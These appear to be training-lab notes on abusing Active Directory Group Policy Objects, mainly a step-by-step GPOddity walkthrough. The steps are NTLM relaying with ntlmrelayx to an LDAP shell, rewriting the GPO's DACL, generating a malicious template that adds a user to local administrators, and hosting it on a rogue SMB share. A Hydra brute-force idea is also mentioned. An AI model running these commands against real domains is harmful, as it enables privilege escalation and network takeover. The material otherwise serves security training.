There're multiple attacks that can be abused Group Policy Object such as:
EvilGPOs (Immediate Schedule Task)
Add Local Admin
Modify Group Policy
Grant Rights (Generic All)
Grant Ownership
GPOddity
GPOddity combines NTLM relaying and modification of Group Policy Container.
By relaying credentials of a user who has WriteDACL on GPO, we can modify the path (gPCFileSysPath) of the Group Policy Template (default is SYSVOL).
Using this, we can load malicious template from a location controller by attacker.
Learning Obj 5
Abuse an overly permissive Group Policy to add student to the local administrators group on domain
#This Jenkins vs has password policy without a restrictive rule, than can be potentially abused via brute force (Hydra)
Get-DomainGPO -Identify 'DevOps Policy'
. C:\AD\Tools\PowerView.ps1
Get-DomainGPO -Identity 'DevOps Policy' #Obtain gpcfilesyspath
#On Linux Attacker Machine
sudo ntlmrelayx.py -t ldaps://<IP_DC> -wh <IP_VM> --http-port '80,8080' -i --no-smb-server
#It will start an LDAP shell (127.0.0.1:11000), we can connect to it open a new tab/shell
nc 127.0.0.1 11000
write_gpo_dacl student1 {GPO_Name_Value_Eg_0BF8D01DC...} #Add studient1 to GPO with GUID indicated.
cd /mnt/c/AD/Tools/GPOddity
#Generate malicious GPTemplate using gppoddity.py
sudo python3 gpoddity.py --gpo-id 'GPO_Name_Value' --domain 'Domain_Name' --username 'student1' --password 'Password_Value' --command 'net localgroup administrators student1 /add' --rogue-smbserver-ip '<IP_VM> --rogue-smbserver-share 'std1-gp' --dc-ip 'DC_IP' --smb-mode none
#After that we need to execute on Windows Machine std1-gp
mkdir /mnt/c/AD/Tools/std1-gp
cp -r /mnt/c/AD/Tools/GPOddity/GPT_Out/* /mnt/c/AD/Tools/std1-gp
net share std1-gp=C:\AD\Tools\std1-gp
icacls "C:\AD\Tools\std1-gp" /grant Everyone:F /T #we became System32
#If we execute again: Get-DomainGPO -Identity "DevOps Policy" the gpcfilesyspath is changed
